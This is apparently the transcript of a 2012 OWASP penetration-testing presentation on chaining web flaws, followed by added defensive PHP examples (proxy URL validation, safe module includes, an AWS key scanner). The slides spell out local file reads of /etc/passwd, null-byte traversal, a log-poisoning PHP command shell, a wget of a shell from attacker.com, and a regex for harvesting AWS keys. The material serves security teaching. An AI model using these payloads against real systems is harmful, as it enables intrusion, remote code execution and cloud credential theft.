Attack Chaining: Advanced Maneuvers for Hack Fu

Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.

Published in: Technology, Design


Transcript

  • 1. Attack Chaining: Advanced Maneuvers for Hack Fu. OWASP ATL, 31 May 2012
  • 2. About Us: WHO ARE THESE DUDES?
      • Rob, Sr. Security Associate @ Stach & Liu
      • Oscar, Security Associate @ Stach & Liu
  • 3. Penetration Test vs. Vulnerability Assessment
  • 4. vs.
  • 5. Simulate a real world attack against a target network or application. - EVERYBODY
  • 6. It answers the question, “could someone break in?”
  • 7. Penetration Testing: (1) Information Gathering, (2) Exploit & Penetrate, (3) Escalate Privileges, (4a) Maintain Access, (4b) Deny Access
  • 8. Pen Testing Scenario
      • Web application penetration test
      • Cloud-based infrastructure hosts multiple sites
      • Out-sourced PHP development to many contractors
      • Determine attacker's ability to compromise PII or infrastructure
  • 9. Step 1 – Explore
  • 10. Step 2 – Read Code: http://vuln.com/dir/share.js
        ... AJAX.Call({ method:'POST', url:'include/s_proxy.php' ...
  • 11. Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php?redirect_url=http://www.google.com
  • 12. Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/passwd
  • 13. Attack Chaining – Maneuver 1
  • 14. Attack Chaining – Maneuver 1
  • 15. Step 5 – Gather More Info: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/httpd.conf
  • 16. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
  • 17. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
        <VirtualHost *>
            ServerName vuln.com
            DocumentRoot /var/www/sites/vuln.com/docroot
            ErrorLog logs/vuln.com_error_log
        </VirtualHost>
  • 18. Step 7 – Back to DirBuster
  • 19. Step 8 – Review Code: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
  • 20. Step 8 – Review Code: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
        <?php
        require_once('includes/config.php');
        // Module and action names are taken straight from the request.
        $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
        $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
        // The include path is built from that input with no validation.
        $currentModuleFile = 'modules/' . $module . '/' . $action . '.php';
        include($currentModuleFile);
        exit;
        ?>
  • 21. Attack Chaining – Maneuver 2
  • 22. Attack Chaining – Maneuver 2
  • 23. Step 9 – Null Byte Injection: http://vuln.com/dir/include/controller.php?module=../../../../../../etc/passwd%00
  • 24. Step 8 – Review Code: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
        <?php
        require_once('includes/config.php');
        $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
        $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
        $currentModuleFile = 'modules/' . $module . '/' . $action . '.php';
        include($currentModuleFile);
        exit;
        ?>
  • 25. Step 10 – Review Gathered Info: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
  • 26. Step 10 – Back to Virtual Conf: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
        <VirtualHost *>
            ServerName vuln.com
            DocumentRoot /var/www/sites/vuln.com/docroot
            ErrorLog logs/vuln.com_error_log
        </VirtualHost>
  • 27. Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
        [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
  • 28. Step 12 – Poison Logs
  • 29. Step 12 – Poison Logs
  • 30. Step 12 – Poison Logs
        <? echo '<pre>'; passthru($_GET['cmd']); echo '</pre>'; ?>
  • 31. Step 13 – PHP in the Log: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
        [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
  • 32. Step 13 – PHP in the Log: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
        [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
        [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: <? echo '<pre>';passthru($_GET['cmd']);echo '<pre>'; ?>
  • 33. Step 14 – Execute Code: http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00cmd=ls;
        /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
  • 34. Step 14 – Execute Code
        <? echo '<pre>'; passthru('ls'); echo '</pre>'; ?>
        /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
  • 35. Attack Chaining – Maneuver 3
  • 36. Attack Chaining – Maneuver 3
  • 37. Step 15 – Upload Shell: http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00cmd=wget%20http://attacker.com/gny.php;
  • 38. Step 16 – Enjoy!
  • 39. Step 17 – I want more! ec2[^d][][A-Z0-9]{20}[]ec2.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]ec2.*[][A-Z0-9]{20}[]ec2(D)*[][A-Z0-9]{20}[]amazon.*[][A-Z0-9]{20}[](amazon|ec2).*[][A-Z0-9]{20}[]amazon(D)*[][A-Z0-9]{20}[]access secret [][A-Z0-9]{20}[] [A-Za-z0-9+/]{40}amazon.*[][A-Z0-9]{20}[].*[][A-Za-z0-9+/]{40}[]aws.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]amazon.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]secret.*[][A-Za-z0-9+/]{40}[][][A-Za-z0-9+/]{40}[].*amazon
  • 40. Step 18 – Amazon AWS Regex
        $this->amazonService = new Zend_Service_Amazon('DB3BAD768F2F11C7628',
        $aws_key = '8AFB5AF55D1E6620EE1';
        define('AMAZON_KEY', '372B8E408D1484C538F');
        if (!defined('awsAccessKey')) define('awsAccessKey', '9F6EB7471C926194884');
        //if (!defined('awsAccessKey')) define('awsAccessKey', '4CAD89B86344CD8C26C');
        define('AMAZON_AES_ACCESS_KEY_ID', '95C95B8DC84AA24C0EC');
  • 41. Step 19 – AWS Takeover
  • 42. Step 20 – Make It Your Own
  • 43. Cost of Amazon Cloud Compromise: CRITICAL EXPOSURE
      1. Found 8 Amazon Secret Keys to access Amazon S3
      2. Found that 2 of the 8 have administrator access to Amazon EC2
      3. Attacker launches 100 Extra Large Clusters
      $1,049,000
  • 44. Take Them Off The Web: CRITICAL EXPOSURE
      1. Found 8 Amazon Secret Keys to access Amazon S3
      2. Found that 2 of the 8 have administrator access to Amazon EC2
      3. Attacker shuts down and deletes all servers and backups permanently
      PRICELESS
  • 45. Attack Chaining – Hack Fu
  • 46. Attack Chaining – Hack Fu
  • 47. Why Is This Happening?
      1. Local File Include
          • File Read Only
          • Code Execution
      2. Null Byte Injection
      3. Log Poisoning
      4. Insecure Credential Storage
      5. Overly Permissive Amazon AWS Keys
      6. Sensitive Information Disclosure
  • 48. Web → Mass Malware Deployment
  • 49. Web → Data Center Compromise
  • 50. Web → Internal Network Compromise
  • 51. Internal Assessment → SSN Bank #’s
  • 52. Infrastructure Review
  • 53. Step 1 – Target Wireless
  • 54. Step 1 – Target Wireless
  • 55. Step 2 – Port Scan
  • 56. Step 3 – Test Default Creds
  • 57. Infrastructure Apocalypse
  • 58. Step 4 – Control AP
  • 59. Step 5 – Read All E-mail
  • 60. Step 6 – Listen To VOIP
  • 61. Step 7 – Open All Doors
  • 62. Step 7 – Open All Doors
  • 63.
  • 64. Step 7 – Server Room Door
  • 65. Is This Real Life?
      1. Insecure Wireless Encryption
      2. Improper Network Segmentation
      3. Insecure Default Configuration
      4. Weak Passwords
      5. Sensitive Information Disclosure
  • 66. Protection – How?
      1. People
      2. Policy
      3. Processes
      4. Strategic / Tactical Security
      5. Defense In-Depth
  • 67. Defense In-Depth IS PROTECTION AGAINST...
  • 68. How Do You Get Better?
  • 69. Synthesis and Patterns: CAN BE BOTH GOOD AND BAD
  • 70. Attack Visualization: LIKE BOBBY FISCHER
  • 71. Thank You
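
The first link in the chain (slides 11, 12 and 15) is a proxy script that fetches whatever `redirect_url` names, including `file://` paths. The following is an added example, not code from the presentation or the tested application, showing one way to validate that parameter before any server-side fetch. `ALLOWED_HOSTS`, `validate_proxy_url()` and `fetch_validated()` are hypothetical names, and the host allowlist is an assumption about what the proxy is meant to reach.

```php
<?php
// Added example, not the application's code: validate redirect_url before any
// server-side fetch. ALLOWED_HOSTS and both function names are hypothetical.

const ALLOWED_SCHEMES = ['http', 'https'];
const ALLOWED_HOSTS   = ['www.google.com'];   // assumption: the proxy's intended targets

/** Return the URL when it may be fetched, or null when it must be refused. */
function validate_proxy_url(string $url): ?string
{
    $parts = parse_url($url);
    // file:///etc/passwd parses with a scheme and a path but no host.
    if (!is_array($parts) || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ALLOWED_SCHEMES, true)) {
        return null;
    }
    // Credentials in the authority ("http://www.google.com@10.0.0.5/") defeat
    // naive substring checks on the host name; refuse them.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }
    return in_array(strtolower($parts['host']), ALLOWED_HOSTS, true) ? $url : null;
}

/** Fetch an already validated URL with the transport locked down as well. */
function fetch_validated(string $url)
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS, // no file://
        CURLOPT_FOLLOWLOCATION => false,   // a 3xx must not re-route the request
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => 5,
    ]);
    return curl_exec($ch);
}

// Constructed inputs using the URL shapes from slides 11, 12 and 15.
foreach (['http://www.google.com', 'file:///etc/passwd',
          'file:///etc/httpd/conf/httpd.conf', 'http://www.google.com@10.0.0.5/'] as $u) {
    printf("%-40s %s\n", $u, validate_proxy_url($u) === null ? 'refused' : 'allowed');
}
```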
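
The second link (slides 20 and 23) is `controller.php` building an `include` path directly from the `module` and `action` request parameters. The following added example, which is not the presenters' or the application's code, shows a hardened dispatch that rejects traversal sequences and NUL bytes and confirms the resolved file stays under the module directory. `MODULE_ROOT` and `resolve_module_file()` are hypothetical names, and the temporary module tree is constructed for the demonstration.

```php
<?php
// Added example: hardened form of the module/action dispatch on slide 20.
// MODULE_ROOT and resolve_module_file() are hypothetical names.

const MODULE_ROOT = __DIR__ . '/modules';

/**
 * Map request-supplied module/action names to a file under $root,
 * or return null when the request must be rejected.
 */
function resolve_module_file(string $module, string $action, string $root = MODULE_ROOT): ?string
{
    // 1. Strict character allowlist: no dots, slashes or NUL bytes, so "../"
    //    traversal and "%00" truncation never reach the filesystem.
    foreach ([$module, $action] as $name) {
        if (!preg_match('/\A[a-z0-9_]{1,64}\z/', $name)) {
            return null;
        }
    }
    // 2. Canonicalise and confirm the result is still inside the module root.
    $rootReal = realpath($root);
    $fileReal = realpath("$root/$module/$action.php");
    if ($rootReal === false || $fileReal === false) {
        return null;
    }
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    return strncmp($fileReal, $prefix, strlen($prefix)) === 0 ? $fileReal : null;
}

// Constructed self-check: build a throwaway module tree and probe it.
$root = sys_get_temp_dir() . '/modules_demo_' . getmypid();
mkdir("$root/news", 0700, true);
file_put_contents("$root/news/list.php", "<?php echo 'news list';");

$probes = [
    ['news', 'list'],                                   // legitimate request
    ["../../../../../../etc/passwd\0", 'x'],            // shape used on slide 23
    ['news', '../../../etc/httpd/logs/error_log'],      // traversal via action
];
foreach ($probes as [$m, $a]) {
    $file = resolve_module_file($m, $a, $root);
    printf("%s / %s => %s\n", json_encode($m), json_encode($a), $file ?? 'rejected');
}

// Remove the constructed tree again.
unlink("$root/news/list.php");
rmdir("$root/news");
rmdir($root);
```

A caller would `include` the returned path only when it is not null and answer with a 404 otherwise.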
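
Slides 39 and 40 search the source tree for hard-coded AWS credentials, and slide 47 names insecure credential storage as a root cause. The following added example, not taken from the presentation, is a scanner a development team could run over its own code before release. The patterns are assumptions modelled on the `[A-Z0-9]{20}` and `[A-Za-z0-9+/]{40}` fragments on slide 39, `scan_source()` is a hypothetical name, and the sample credentials are the example values from AWS's public documentation.

```php
<?php
// Added example: find hard-coded AWS credentials in your own source before an
// attacker does. Names and patterns here are assumptions, not the slide's regexes.

const KEY_ID_RE  = '/(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])/';
const SECRET_RE  = '/(?<![A-Za-z0-9+\/])[A-Za-z0-9+\/]{40}(?![A-Za-z0-9+\/])/';
const CONTEXT_RE = '/aws|amazon|ec2|secret|access/i';   // cuts false positives

/** Return one finding per credential-shaped string on a line with AWS context. */
function scan_source(string $source, string $label): array
{
    $findings = [];
    foreach (preg_split('/\R/', $source) as $i => $line) {
        if (!preg_match(CONTEXT_RE, $line)) {
            continue;
        }
        foreach (['access-key-id' => KEY_ID_RE, 'secret-key' => SECRET_RE] as $kind => $re) {
            if (!preg_match_all($re, $line, $m)) {
                continue;
            }
            foreach ($m[0] as $hit) {
                $findings[] = [
                    'file' => $label,
                    'line' => $i + 1,
                    'kind' => $kind,
                    // Mask the value so the report is not itself a leak.
                    'value' => substr($hit, 0, 4) . str_repeat('*', strlen($hit) - 4),
                ];
            }
        }
    }
    return $findings;
}

// Constructed sample; the credentials are AWS's documented example values.
$sample = <<<'PHP'
define('AMAZON_KEY', 'AKIAIOSFODNN7EXAMPLE');
$aws_secret = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY';
$title = 'ABCDEFGHIJ0123456789';
PHP;

foreach (scan_source($sample, 'config.php') as $f) {
    printf("%s:%d %s %s\n", $f['file'], $f['line'], $f['kind'], $f['value']);
}
```

To scan a real tree, call `scan_source(file_get_contents($path), $path)` for each file; any key that turns up should be rotated and replaced with a narrowly scoped credential loaded from outside the web root.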
